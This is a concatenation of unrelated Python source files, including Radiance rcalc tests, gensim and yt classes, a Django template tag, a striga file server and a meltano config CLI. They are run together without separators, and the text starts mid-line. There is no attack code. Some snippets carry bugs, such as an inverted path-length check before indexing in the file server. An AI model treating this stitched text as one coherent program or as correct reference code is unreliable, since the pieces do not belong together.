None, {}) send_typing_notification.metadata = {'url': '/chat/threads/{chatThreadId}/typing'} # type: ignore Lilith5th/Radiance # -*- coding: utf-8 -*- from __future__ import division, print_function, unicode_literals # We currently only test for output of recno after receiving a # single column list from cnt(). # This serves to uncover the nl eating bug in buffered pipes # in Visual Studio 2015 before update 2. import struct import unittest from pyradlib import lcompare from pyradlib.pyrad_proc import PIPE, Error, ProcMixin class RcalcTestCase(unittest.TestCase, ProcMixin): def _runit(self, cmd1, cmd2, actstr, nl=False): try: procs = self.call_many((cmd1, cmd2), actstr, out=PIPE, universal_newlines=nl) res, eres = procs[-1].communicate() if eres: print('Errors', eres) # XXX except Error as e: self.fail('%s [%s]' % (str(e), self.qjoin(cmd))) finally: for proc in procs: proc.wait() if nl: return [int(s) for s in res.split()] return res #return lcompare.split_rad(raw) def test_recno_oascii(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000,9876): orig = range(n) exp = [i+1 for i in orig] cntcmd = ['cnt', str(n)] aacmd = ['rcalc', '-e', '$1=recno'] aresl = self._runit(cntcmd, aacmd, 'calculate recno', nl=True) try: lcompare.lcompare(aresl, exp) except lcompare.error as e: self.fail(('recno_oascii n=%d -- ' % n) +str(e)) def test_recno_ofloat(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000): orig = range(n) exp = (i+1 for i in orig) cntcmd = ['cnt', str(n)] afcmd = ['rcalc', '-of', '-e', '$1=recno'] res = self._runit(cntcmd, afcmd, 'calculate recno') if len(res) != n * 4: self.fail(('recno_ofloat n=%d -- Length of resulting data ' 'differs from expected (%d != %d)') % (n, len(res), n*4)) iresl = struct.unpack('f'*n, res) try: lcompare.lcompare(iresl, exp) except lcompare.error as e: self.fail(('recno_ofloat n=%d -- ' % n) +str(e)) def test_recno_odouble(self): for n in (5, 10, 55, 200,1321, 1328,1329,1330,1331,1332, 2000, 3721, 5000): orig = range(n) exp = (i+1 for i in orig) cntcmd = ['cnt', str(n)] adcmd = ['rcalc', '-od', '-e', '$1=recno'] res = self._runit(cntcmd, adcmd, 'calculate recno') if len(res) != n * 8: self.fail(('recno_odouble n=%d -- Length of resulting data ' 'differs from expected (%d != %d)') % (n, len(res), n*8)) iresl = struct.unpack('d'*n, res) try: lcompare.lcompare(iresl, exp) except lcompare.error as e: self.fail(('recno_odouble n=%d -- ' % n) +str(e)) # vi: set ts=4 sw=4 : 0 from django import template from django.core.cache import cache from example.models import MyBackground register = template.Library() @register.simple_tag(takes_context=True) def load_error_img(context): cache_key = f"site_error_{context['error_code']}_context" try: context_cache = cache.get(cache_key) except Exception: context_cache = None if context_cache is None: try: custom_context = ( MyBackground.objects.values("image__file") .filter(name=context["error_code"]) .first() ) context_cache = cache.set( cache_key, custom_context["image__file"], timeout=86400 ) return custom_context["image__file"] except Exception as err: print(err) return context_cache or "" extract_poetry_line_feature.py import numpy as np from poetry_handler import read_raw_ccpc, to_lines from pathlib import Path from easydict import EasyDict from utils.config import cfg_from_yaml_file from infer import load_model, encode_texts import torch from tqdm import tqdm if __name__ == '__main__': # all poetry data data = [] test_data = read_raw_ccpc('data/poetry/CCPC/ccpc_test_v1.0.json') data.extend(test_data) train_data = read_raw_ccpc('data/poetry/CCPC/ccpc_train_v1.0.json') data.extend(train_data) valid_data = read_raw_ccpc('data/poetry/CCPC/ccpc_valid_v1.0.json') data.extend(valid_data) # lines = to_lines(data) lines = ['日照香炉生紫烟', '遥看瀑布挂前川', '飞流直下三千尺', '疑是银河落九天', '千呼万唤始出来', '犹抱琵琶半遮面', '转轴拨弦三两声', '未成曲调先有情', '天生丽质难自弃', '一朝选在君王侧', '回眸一笑百媚生', '六宫粉黛无颜色' ] # model config cfg = EasyDict() cfg.ROOT_DIR = (Path(__file__).resolve().parent / './').resolve() cfg_from_yaml_file('./cfg/test_xyb.yml', cfg) if torch.cuda.is_available(): torch.cuda.set_device(cfg.DEVICE.GPU) model = load_model(cfg, '../BriVL-pretrain-model/BriVL-1.0-5500w.pth') texts_emb = encode_texts(cfg, lines, model) line_emb_list = [[line, emb] for line, emb in tqdm(zip(lines, texts_emb))] np.save('logs/saves/poetry.npy', line_emb_list) import logging from gensim import utils from gensim.interfaces import CorpusABC from gensim.utils import to_utf8, file_or_filename from smart_open import smart_open class LineCorpus(CorpusABC): """A class for storing corpus as text.""" def __init__(self, input): self.input = input self.length = sum(1 for _ in file_or_filename(self.input)) def __iter__(self): """Yield each document as list of words separated by space.""" with file_or_filename(self.input) as file: for line in file.read().splitlines(): yield [str(byte_word, 'utf-8') for byte_word in line.split()] def __len__(self): """Return the number of documents in corpus.""" return self.length @staticmethod def save_corpus(fname, corpus, id2word=None, progress_cnt=1000, metadata=False): """Store documents one on each line as plain text words.""" logging.info("storing corpus in Line format to %s", fname) def word_id2word(word_id): try: return id2word[word_id] except KeyError: return "" with smart_open(fname, 'wb') as f: if metadata: docno2metadata = {} for docno, doc in enumerate(corpus): if metadata: doc, data = doc docno2metadata[docno] = data if docno % progress_cnt == 0: logging.info("PROGRESS: saving document #%i", docno) fmt = ' '.join(map(word_id2word, doc)) f.write(to_utf8("%s\n" % fmt)) if metadata: utils.pickle(docno2metadata, fname + '.metadata.cpickle') @classmethod def serialize(serializer, fname, corpus, id2word, progress_cnt=None, metadata=False): """Serialize corpus in Line format""" kwargs = {'metadata': metadata} if progress_cnt is not None: kwargs['progress_cnt'] = progress_cnt serializer.save_corpus(fname, corpus, id2word, **kwargs) class id_drive_to_download: ids_dataset={ "csvs_IRT.zip":"1-S_pyKos3lCaTTW6cspF7pHsuQq727WW", "round8_csvs_matriz_porcentajes.zip":"11tJw9FkY1I5hn4AYgzxFPDBE0vlY1HRI" }ateska/striga import os, mimetypes, fnmatch, re, stat, time, logging as L import striga.core.exception ### class Serve(object): ''' Process bus object that sends plain files from disk to client ''' #TODO: Possibility of serving files from subdirectories def __init__(self, rootdir, pattern, buffersize): regex = fnmatch.translate(pattern) self.RootDir = rootdir self.Pattern = re.compile(regex) self.BufferSize = buffersize def __call__(self, ctx, path): if len(path) > 0: raise striga.core.exception.StrigaBusError("NotFound") if self.Pattern.match(path[0]) is None: raise striga.core.exception.StrigaBusError("NotFound") fname = os.path.join(self.RootDir, path[0]) try: fstats = os.stat(fname) except: raise striga.core.exception.StrigaBusError("NotFound") if not stat.S_ISREG(fstats.st_mode): return True fMType, fContentEncoding = mimetypes.guess_type(fname) ctx.res.SetContentType(fMType) ctx.res.SetContentLength(fstats.st_size) ctx.res.CustomHTTPHeader.Set('Last-Modified', time.ctime(fstats.st_mtime)) ctx.res.SetBufferSize(0) #Do not buffer output - writes will be called in large pieces anyway fin = file(fname,'rb') while True: buffer = fin.read(self.BufferSize) if len(buffer) == 0: break ctx.res.Write(buffer) from __future__ import unicode_literals from builtins import map from copy import deepcopy from snips_nlu.constants import CUSTOM_ENTITY_PARSER_USAGE from snips_nlu.entity_parser import CustomEntityParserUsage from snips_nlu.pipeline.configs import ProcessingUnitConfig from snips_nlu.pipeline.processing_unit import get_processing_unit_config from snips_nlu.resources import merge_required_resources from snips_nlu.utils import classproperty class NLUEngineConfig(ProcessingUnitConfig): """Configuration of a :class:`.SnipsNLUEngine` object Args: intent_parsers_configs (list): List of intent parser configs (:class:`.ProcessingUnitConfig`). The order in the list determines the order in which each parser will be called by the nlu engine. """ # pylint: disable=super-init-not-called def __init__(self, intent_parsers_configs=None): if intent_parsers_configs is None: from snips_nlu.pipeline.configs import ( ProbabilisticIntentParserConfig, DeterministicIntentParserConfig) intent_parsers_configs = [ DeterministicIntentParserConfig(), ProbabilisticIntentParserConfig() ] self.intent_parsers_configs = list(map(get_processing_unit_config, intent_parsers_configs)) # pylint: enable=super-init-not-called @classproperty def unit_name(cls): # pylint:disable=no-self-argument from snips_nlu.nlu_engine.nlu_engine import SnipsNLUEngine return SnipsNLUEngine.unit_name def get_required_resources(self): # Resolving custom slot values must be done without stemming resources = { CUSTOM_ENTITY_PARSER_USAGE: CustomEntityParserUsage.WITHOUT_STEMS } for config in self.intent_parsers_configs: resources = merge_required_resources( resources, config.get_required_resources()) return resources def to_dict(self): return { "unit_name": self.unit_name, "intent_parsers_configs": [ config.to_dict() for config in self.intent_parsers_configs ] } @classmethod def from_dict(cls, obj_dict): d = obj_dict if "unit_name" in obj_dict: d = deepcopy(obj_dict) d.pop("unit_name") return cls(**d) 0 """This module contains the general information for EquipmentCimcVmedia ManagedObject.""" from ...ucscentralmo import ManagedObject from ...ucscentralcoremeta import UcsCentralVersion, MoPropertyMeta, MoMeta from ...ucscentralmeta import VersionMeta class EquipmentCimcVmediaConsts(): IS_SUPPORTED_FALSE = "false" IS_SUPPORTED_NO = "no" IS_SUPPORTED_TRUE = "true" IS_SUPPORTED_YES = "yes" class EquipmentCimcVmedia(ManagedObject): """This is EquipmentCimcVmedia class.""" consts = EquipmentCimcVmediaConsts() naming_props = set([u'isSupported']) mo_meta = MoMeta("EquipmentCimcVmedia", "equipmentCimcVmedia", "cimcvmediasupp-[is_supported]", VersionMeta.Version121a, "InputOutput", 0x3f, [], [""], [u'equipmentBladeCapProvider', u'equipmentRackUnitCapProvider', u'equipmentServerUnitCapProvider'], [], ["Get"]) prop_meta = { "child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version121a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []), "dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []), "is_supported": MoPropertyMeta("is_supported", "isSupported", "string", VersionMeta.Version121a, MoPropertyMeta.NAMING, 0x4, None, None, None, ["false", "no", "true", "yes"], []), "min_bios_version": MoPropertyMeta("min_bios_version", "minBiosVersion", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), "min_cimc_version": MoPropertyMeta("min_cimc_version", "minCimcVersion", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), "name": MoPropertyMeta("name", "name", "string", VersionMeta.Version121a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []), "rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version121a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []), "status": MoPropertyMeta("status", "status", "string", VersionMeta.Version121a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []), } prop_map = { "childAction": "child_action", "dn": "dn", "isSupported": "is_supported", "minBiosVersion": "min_bios_version", "minCimcVersion": "min_cimc_version", "name": "name", "rn": "rn", "status": "status", } def __init__(self, parent_mo_or_dn, is_supported, **kwargs): self._dirty_mask = 0 self.is_supported = is_supported self.child_action = None self.min_bios_version = None self.min_cimc_version = None self.name = None self.status = None ManagedObject.__init__(self, "EquipmentCimcVmedia", parent_mo_or_dn, **kwargs) from .helper import evaluate, session from mathics.builtin.base import BoxConstruct, Predefined from mathics.builtin.graphics import GRAPHICS_OPTIONS from mathics.core.attributes import hold_all, protected, read_protected class CustomBoxConstruct(BoxConstruct): def __init__(self, evaluation): super().__init__(evaluation=evaluation) self._elements = [1, 2, 3] def boxes_to_text(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + self._elements.__str__() + ">>" def boxes_to_mathml(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + self._elements.__str__() + ">>" def boxes_to_tex(self, leaves=None, **options): if not leaves: leaves = self._elements return "CustomBoxConstruct<<" + int(self._elements) + ">>" class CustomAtom(Predefined): """ just a test """ context = "System`" rules = { "N[System`CustomAtom]": "37", } def apply_to_boxes(self, evaluation): "System`MakeBoxes[System`CustomAtom, StandardForm|TraditionalForm|OutputForm|InputForm]" return CustomBoxConstruct(evaluation=evaluation) class CustomGraphicsBox(BoxConstruct): """""" options = GRAPHICS_OPTIONS attributes = hold_all | protected | read_protected def apply_box(self, elems, evaluation, options): """System`MakeBoxes[System`Graphics[elems_, System`OptionsPattern[System`Graphics]], System`StandardForm|System`TraditionalForm|System`OutputForm]""" instance = CustomGraphicsBox(*(elems._elements), evaluation=evaluation) return instance def boxes_to_text(self, leaves=None, **options): if leaves: self._elements = leaves return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_tex(self, leaves=None, **options): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_mathml(self, leaves=None, **options): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def boxes_to_svg(self, evaluation): return ( "--custom graphics--: I should plot " + self._elements.__str__() + " items" ) def test_custom_boxconstruct(): defs = session.evaluation.definitions instance_custom_atom = CustomAtom(expression=False) instance_custom_atom.contribute(defs, is_pymodule=True) evaluate("MakeBoxes[CustomAtom, InputForm]") formatted = session.format_result().boxes_to_mathml() assert formatted == "CustomBoxConstruct<<[1, 2, 3]>>" def test_custom_graphicsbox_constructor(): defs = session.evaluation.definitions instance_customgb_atom = CustomGraphicsBox( expression=False, evaluation=session.evaluation ) instance_customgb_atom.contribute(defs, is_pymodule=True) evaluate("MakeBoxes[Graphics[{Circle[{0,0},1]}], OutputForm]") formatted = session.format_result().boxes_to_mathml() assert ( formatted == "--custom graphics--: I should plot (,) items" ) def main(state): import sys sys.exit(0)""" This file is part of the everest project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Created on Dec 1, 2011. """ from everest.repositories.rdb.utils import mapper from everest.tests.complete_app.entities import MyEntity from everest.tests.complete_app.entities import MyEntityChild from everest.tests.complete_app.entities import MyEntityGrandchild from everest.tests.complete_app.entities import MyEntityParent from sqlalchemy import Column from sqlalchemy import ForeignKey from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy import String from sqlalchemy import Table from sqlalchemy.orm import relationship __docformat__ = 'reStructuredText en' __all__ = ['create_metadata', ] def create_metadata(engine): metadata = MetaData() # # TABLES # my_entity_parent_tbl = \ Table('my_entity_parent', metadata, Column('my_entity_parent_id', Integer, primary_key=True), Column('text', String), Column('text_ent', String), ) # 1:1 MyEntity <=> MyEntityParent my_entity_tbl = \ Table('my_entity', metadata, Column('my_entity_id', Integer, primary_key=True), Column('text', String), Column('text_ent', String), Column('number', Integer), Column('my_entity_parent_id', Integer, ForeignKey(my_entity_parent_tbl.c.my_entity_parent_id), nullable=False), ) # 1:n MyEntity <-> MyEntityChild my_entity_child_tbl = \ Table('my_entity_child', metadata, Column('text', String), Column('text_ent', String), Column('my_entity_child_id', Integer, primary_key=True), Column('my_entity_id', Integer, ForeignKey(my_entity_tbl.c.my_entity_id), nullable=False), ) # n:m MyEntityChild <-> MyEntityGrandchild my_entity_grandchild_tbl = \ Table('my_entity_grandchild', metadata, Column('text', String), Column('text_ent', String), Column('my_entity_grandchild_id', Integer, primary_key=True), ) my_entity_child_children_tbl = \ Table('my_entity_child_children', metadata, Column('my_entity_child_id', Integer, ForeignKey(my_entity_child_tbl.c.my_entity_child_id), nullable=False), Column('my_entity_grandchild_id', Integer, ForeignKey( my_entity_grandchild_tbl.c.my_entity_grandchild_id), nullable=False) ) # # MAPPERS # mapper(MyEntityParent, my_entity_parent_tbl, id_attribute='my_entity_parent_id', properties= dict(child=relationship(MyEntity, uselist=False, back_populates='parent'), ) ) mapper(MyEntity, my_entity_tbl, id_attribute='my_entity_id', properties= dict(parent=relationship(MyEntityParent, uselist=False, back_populates='child'), children=relationship(MyEntityChild, back_populates='parent', cascade="all, delete-orphan"), ) ) mapper(MyEntityChild, my_entity_child_tbl, id_attribute='my_entity_child_id', properties= dict(parent=relationship(MyEntity, uselist=False, back_populates='children', cascade='save-update' ), children= relationship(MyEntityGrandchild, secondary=my_entity_child_children_tbl, back_populates='parent'), ), ) mapper(MyEntityGrandchild, my_entity_grandchild_tbl, id_attribute='my_entity_grandchild_id', properties= dict(parent=relationship(MyEntityChild, uselist=False, secondary=my_entity_child_children_tbl, back_populates='children'), ), ) # Create the mappers. # metadata.bind = engine metadata.create_all(engine) return metadata kuochuanpan/yt import os import numpy as np from yt import units from yt.fields.field_detector import FieldDetector from yt.fields.field_info_container import FieldInfoContainer from yt.frontends.ramses.io import convert_ramses_ages from yt.funcs import issue_deprecation_warning, mylog from yt.utilities.cython_fortran_utils import FortranFile from yt.utilities.linear_interpolators import BilinearFieldInterpolator from yt.utilities.physical_constants import ( boltzmann_constant_cgs, mass_hydrogen_cgs, mh, mp, ) from .field_handlers import RTFieldFileHandler b_units = "code_magnetic" ra_units = "code_length / code_time**2" rho_units = "code_density" vel_units = "code_velocity" pressure_units = "code_pressure" ener_units = "code_mass * code_velocity**2" ang_mom_units = "code_mass * code_velocity * code_length" cooling_function_units = " erg * cm**3 /s" cooling_function_prime_units = " erg * cm**3 /s/K" flux_unit = "1 / code_length**2 / code_time" number_density_unit = "1 / code_length**3" known_species_masses = dict( (sp, mh * v) for sp, v in [ ("HI", 1.0), ("HII", 1.0), ("Electron", 1.0), ("HeI", 4.0), ("HeII", 4.0), ("HeIII", 4.0), ("H2I", 2.0), ("H2II", 2.0), ("HM", 1.0), ("DI", 2.0), ("DII", 2.0), ("HDI", 3.0), ] ) _cool_axes = ("lognH", "logT") # , "logTeq") _cool_arrs = ( ("cooling_primordial", cooling_function_units), ("heating_primordial", cooling_function_units), ("cooling_compton", cooling_function_units), ("heating_compton", cooling_function_units), ("cooling_metal", cooling_function_units), ("cooling_primordial_prime", cooling_function_prime_units), ("heating_primordial_prime", cooling_function_prime_units), ("cooling_compton_prime", cooling_function_prime_units), ("heating_compton_prime", cooling_function_prime_units), ("cooling_metal_prime", cooling_function_prime_units), ("mu", None), ("abundances", None), ) _cool_species = ( "Electron_number_density", "HI_number_density", "HII_number_density", "HeI_number_density", "HeII_number_density", "HeIII_number_density", ) _X = 0.76 # H fraction, hardcoded _Y = 0.24 # He fraction, hardcoded class RAMSESFieldInfo(FieldInfoContainer): known_other_fields = ( ("Density", (rho_units, ["density"], None)), ("x-velocity", (vel_units, ["velocity_x"], None)), ("y-velocity", (vel_units, ["velocity_y"], None)), ("z-velocity", (vel_units, ["velocity_z"], None)), ("Pres_IR", (pressure_units, ["pres_IR", "pressure_IR"], None)), ("Pressure", (pressure_units, ["pressure"], None)), ("Metallicity", ("", ["metallicity"], None)), ("HII", ("", ["H_p1_fraction"], None)), ("HeII", ("", ["He_p1_fraction"], None)), ("HeIII", ("", ["He_p2_fraction"], None)), ("x-acceleration", (ra_units, ["acceleration_x"], None)), ("y-acceleration", (ra_units, ["acceleration_y"], None)), ("z-acceleration", (ra_units, ["acceleration_z"], None)), ("Potential", (ener_units, ["potential"], None)), ("B_x_left", (b_units, ["magnetic_field_x_left"], None)), ("B_x_right", (b_units, ["magnetic_field_x_right"], None)), ("B_y_left", (b_units, ["magnetic_field_y_left"], None)), ("B_y_right", (b_units, ["magnetic_field_y_right"], None)), ("B_z_left", (b_units, ["magnetic_field_z_left"], None)), ("B_z_right", (b_units, ["magnetic_field_z_right"], None)), ) known_particle_fields = ( ("particle_position_x", ("code_length", [], None)), ("particle_position_y", ("code_length", [], None)), ("particle_position_z", ("code_length", [], None)), ("particle_velocity_x", (vel_units, [], None)), ("particle_velocity_y", (vel_units, [], None)), ("particle_velocity_z", (vel_units, [], None)), ("particle_mass", ("code_mass", [], None)), ("particle_identity", ("", ["particle_index"], None)), ("particle_refinement_level", ("", [], None)), ("particle_birth_time", ("code_time", ["age"], None)), ("conformal_birth_time", ("", [], None)), ("particle_metallicity", ("", [], None)), ("particle_family", ("", [], None)), ("particle_tag", ("", [], None)), ) known_sink_fields = ( ("particle_position_x", ("code_length", [], None)), ("particle_position_y", ("code_length", [], None)), ("particle_position_z", ("code_length", [], None)), ("particle_velocity_x", (vel_units, [], None)), ("particle_velocity_y", (vel_units, [], None)), ("particle_velocity_z", (vel_units, [], None)), ("particle_mass", ("code_mass", [], None)), ("particle_identifier", ("", ["particle_index"], None)), ("particle_birth_time", ("code_time", ["age"], None)), ("BH_real_accretion", ("code_mass/code_time", [], None)), ("BH_bondi_accretion", ("code_mass/code_time", [], None)), ("BH_eddington_accretion", ("code_mass/code_time", [], None)), ("BH_esave", (ener_units, [], None)), ("gas_spin_x", (ang_mom_units, [], None)), ("gas_spin_y", (ang_mom_units, [], None)), ("gas_spin_z", (ang_mom_units, [], None)), ("BH_spin_x", ("", [], None)), ("BH_spin_y", ("", [], None)), ("BH_spin_z", ("", [], None)), ("BH_spin", (ang_mom_units, [], None)), ("BH_efficiency", ("", [], None)), ) def setup_particle_fields(self, ptype): super(RAMSESFieldInfo, self).setup_particle_fields(ptype) def particle_age(field, data): msg = ( "The RAMSES particle_age field has been deprecated since " "it did not actually represent particle ages in all " "cases. To get the time when a particle was formed use " "the particle_birth_time field instead. To get the " "age of a star particle, use the star_age field" ) if not isinstance(data, FieldDetector): issue_deprecation_warning(msg, stacklevel=2) if data.ds.cosmological_simulation: conformal_age = data[ptype, "conformal_birth_time"] ret = convert_ramses_ages(data.ds, conformal_age) return data.ds.arr(ret, "code_time") else: return data[ptype, "particle_birth_time"] self.add_field( (ptype, "particle_age"), sampling_type="particle", function=particle_age, units=self.ds.unit_system["time"], ) def star_age(field, data): if data.ds.cosmological_simulation: conformal_age = data[ptype, "conformal_birth_time"] formation_time = convert_ramses_ages(data.ds, conformal_age) formation_time = data.ds.arr(formation_time, "code_time") else: formation_time = data["particle_birth_time"] return data.ds.current_time - formation_time self.add_field( (ptype, "star_age"), sampling_type="particle", function=star_age, units=self.ds.unit_system["time"], ) def setup_fluid_fields(self): def _temperature(field, data): rv = data["gas", "pressure"] / data["gas", "density"] rv *= mass_hydrogen_cgs / boltzmann_constant_cgs return rv self.add_field( ("gas", "temperature"), sampling_type="cell", function=_temperature, units=self.ds.unit_system["temperature"], ) self.create_cooling_fields() # See if we need to load the rt fields rt_flag = RTFieldFileHandler.any_exist(self.ds) if rt_flag: # rt run self.create_rt_fields() # Load magnetic fields if ("gas", "magnetic_field_x_left") in self: self.create_magnetic_fields() def create_magnetic_fields(self): # Calculate cell-centred magnetic fields from face-centred def mag_field(ax): def _mag_field(field, data): return ( data[f"magnetic_field_{ax}_left"] + data[f"magnetic_field_{ax}_right"] ) / 2 return _mag_field for ax in self.ds.coordinates.axis_order: self.add_field( ("gas", f"magnetic_field_{ax}"), sampling_type="cell", function=mag_field(ax), units=self.ds.unit_system["magnetic_field_cgs"], ) def _divB(field, data): """Calculate magnetic field divergence""" out = np.zeros_like(data["magnetic_field_x_right"]) for ax in data.ds.coordinates.axis_order: out += ( data[f"magnetic_field_{ax}_right"] - data[f"magnetic_field_{ax}_left"] ) return out / data["dx"] self.add_field( ("gas", "magnetic_field_divergence"), sampling_type="cell", function=_divB, units=self.ds.unit_system["magnetic_field_cgs"] / self.ds.unit_system["length"], ) def create_rt_fields(self): self.ds.fluid_types += ("rt",) p = RTFieldFileHandler.get_rt_parameters(self.ds).copy() p.update(self.ds.parameters) ngroups = p["nGroups"] rt_c = p["rt_c_frac"] * units.c / (p["unit_l"] / p["unit_t"]) dens_conv = (p["unit_np"] / rt_c).value / units.cm ** 3 ######################################## # Adding the fields in the hydro_* files def _temp_IR(field, data): rv = data["gas", "pres_IR"] / data["gas", "density"] rv *= mass_hydrogen_cgs / boltzmann_constant_cgs return rv self.add_field( ("gas", "temp_IR"), sampling_type="cell", function=_temp_IR, units=self.ds.unit_system["temperature"], ) for species in ["H_p1", "He_p1", "He_p2"]: def _species_density(field, data): return data["gas", species + "_fraction"] * data["gas", "density"] self.add_field( ("gas", species + "_density"), sampling_type="cell", function=_species_density, units=self.ds.unit_system["density"], ) def _species_mass(field, data): return data["gas", species + "_density"] * data["index", "cell_volume"] self.add_field( ("gas", species + "_mass"), sampling_type="cell", function=_species_mass, units=self.ds.unit_system["mass"], ) ######################################## # Adding the fields in the rt_ files def gen_pdens(igroup): def _photon_density(field, data): rv = data["ramses-rt", f"Photon_density_{igroup + 1}"] * dens_conv return rv return _photon_density for igroup in range(ngroups): self.add_field( ("rt", f"photon_density_{igroup + 1}"), sampling_type="cell", function=gen_pdens(igroup), units=self.ds.unit_system["number_density"], ) flux_conv = p["unit_pf"] / units.cm ** 2 / units.s def gen_flux(key, igroup): def _photon_flux(field, data): rv = data["ramses-rt", f"Photon_flux_{key}_{igroup + 1}"] * flux_conv return rv return _photon_flux flux_unit = ( 1 / self.ds.unit_system["time"] / self.ds.unit_system["length"] ** 2 ).units for key in "xyz": for igroup in range(ngroups): self.add_field( ("rt", f"photon_flux_{key}_{igroup + 1}"), sampling_type="cell", function=gen_flux(key, igroup), units=flux_unit, ) def create_cooling_fields(self): num = os.path.basename(self.ds.parameter_filename).split(".")[0].split("_")[1] filename = "%s/cooling_%05i.out" % ( os.path.dirname(self.ds.parameter_filename), int(num), ) if not os.path.exists(filename): mylog.warning("This output has no cooling fields") return # Function to create the cooling fields def _create_field(name, interp_object, unit): def _func(field, data): shape = data["temperature"].shape d = { "lognH": np.log10(_X * data["density"] / mh).ravel(), "logT": np.log10(data["temperature"]).ravel(), } rv = interp_object(d).reshape(shape) if name[-1] != "mu": rv = 10 ** interp_object(d).reshape(shape) cool = data.ds.arr(rv, unit) if "metal" in name[-1].split("_"): cool = cool * data["metallicity"] / 0.02 # Ramses uses Zsolar=0.02 elif "compton" in name[-1].split("_"): cool = data.ds.arr(rv, unit + "/cm**3") cool = ( cool / data["number_density"] ) # Compton cooling/heating is written to file in erg/s return cool self.add_field(name=name, sampling_type="cell", function=_func, units=unit) # Load cooling files avals = {} tvals = {} with FortranFile(filename) as fd: n1, n2 = fd.read_vector("i") for ax in _cool_axes: avals[ax] = fd.read_vector("d") for i, (tname, unit) in enumerate(_cool_arrs): var = fd.read_vector("d") if var.size == n1 and i == 0: # If this case occurs, the cooling files were produced pre-2010 in # a format that is no longer supported mylog.warning( "This cooling file format is no longer supported. " "Cooling field loading skipped." ) return if var.size == n1 * n2: tvals[tname] = dict( data=var.reshape((n1, n2), order="F"), unit=unit ) else: var = var.reshape((n1, n2, var.size // (n1 * n2)), order="F") for i in range(var.shape[-1]): tvals[_cool_species[i]] = dict( data=var[:, :, i], unit="1/cm**3" ) # Add the mu field first, as it is needed for the number density interp = BilinearFieldInterpolator( tvals["mu"]["data"], (avals["lognH"], avals["logT"]), ["lognH", "logT"], truncate=True, ) _create_field(("gas", "mu"), interp, tvals["mu"]["unit"]) # Add the number density field, based on mu def _number_density(field, data): return data[("gas", "density")] / mp / data["mu"] self.add_field( name=("gas", "number_density"), sampling_type="cell", function=_number_density, units=number_density_unit, ) # Add the cooling and heating fields, which need the number density field for key in tvals: if key != "mu": interp = BilinearFieldInterpolator( tvals[key]["data"], (avals["lognH"], avals["logT"]), ["lognH", "logT"], truncate=True, ) _create_field(("gas", key), interp, tvals[key]["unit"]) # Add total cooling and heating fields def _all_cool(field, data): return ( data["cooling_primordial"] + data["cooling_metal"] + data["cooling_compton"] ) def _all_heat(field, data): return data["heating_primordial"] + data["heating_compton"] self.add_field( name=("gas", "cooling_total"), sampling_type="cell", function=_all_cool, units=cooling_function_units, ) self.add_field( name=("gas", "heating_total"), sampling_type="cell", function=_all_heat, units=cooling_function_units, ) # Add net cooling fields def _net_cool(field, data): return data["cooling_total"] - data["heating_total"] self.add_field( name=("gas", "cooling_net"), sampling_type="cell", function=_net_cool, units=cooling_function_units, ) from .mapper import ApiResponse, ApiResponseInterface from .mapper.types import Timestamp, AnyType from .model import Suggestion __all__ = ['LinkAddressBookResponse'] class LinkAddressBookResponseInterface(ApiResponseInterface): items: [Suggestion] class LinkAddressBookResponse(ApiResponse, LinkAddressBookResponseInterface): pass 1-10 import click from . import cli from .params import project from meltano.core.db import project_engine from meltano.core.project import Project from meltano.core.config_service import ConfigService from meltano.core.plugin.settings_service import PluginSettingsService @cli.group(invoke_without_command=True) @click.argument("plugin_name") @click.option("--format", default="json") @project(migrate=True) @click.pass_context def config(ctx, project, plugin_name, format): config = ConfigService(project) plugin = config.find_plugin(plugin_name) _, Session = project_engine(project) session = Session() settings = PluginSettingsService(project) ctx.obj["settings"] = settings ctx.obj["plugin"] = plugin ctx.obj["session"] = session if ctx.invoked_subcommand is None: if format == "json": print(settings.as_config(session, plugin)) if format == "env": for env, value in settings.as_env(session, plugin).items(): print(f"{env}={value}") @config.command() @click.argument("setting_name") @click.argument("value") @click.pass_context def set(ctx, setting_name, value): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] settings.set(session, plugin, setting_name, value) @config.command() @click.argument("setting_name") @click.pass_context def unset(ctx, setting_name): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] settings.unset(session, plugin, setting_name) @config.command() @click.pass_context def reset(ctx): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] session = ctx.obj["session"] for setting in settings.definitions(plugin): settings.unset(session, plugin, setting.name) @config.command() @click.pass_context def list(ctx): settings = ctx.obj["settings"] plugin = ctx.obj["plugin"] plugin_def = settings.get_definition(plugin) for setting_def in settings.definitions(plugin): env_key = settings.setting_env(setting_def, plugin_def) description_marker = ( f": {setting_def['description']}" if setting_def.get("description") else "" ) click.secho(f"{setting_def['name']} [{env_key}]{description_marker}") from setuptools import setup import os desc = open("README.rst").read() if os.path.isfile("README.rst") else "" setup( name='datatables', version='0.4.9', packages=['datatables'], url='https://github.com/actuarial-tools/py-datatables/', license='MIT', long_description=desc, keywords='sqlalchemy datatables jquery pyramid flask', author='', author_email='', description='Integrates SQLAlchemy with DataTables (framework agnostic)', 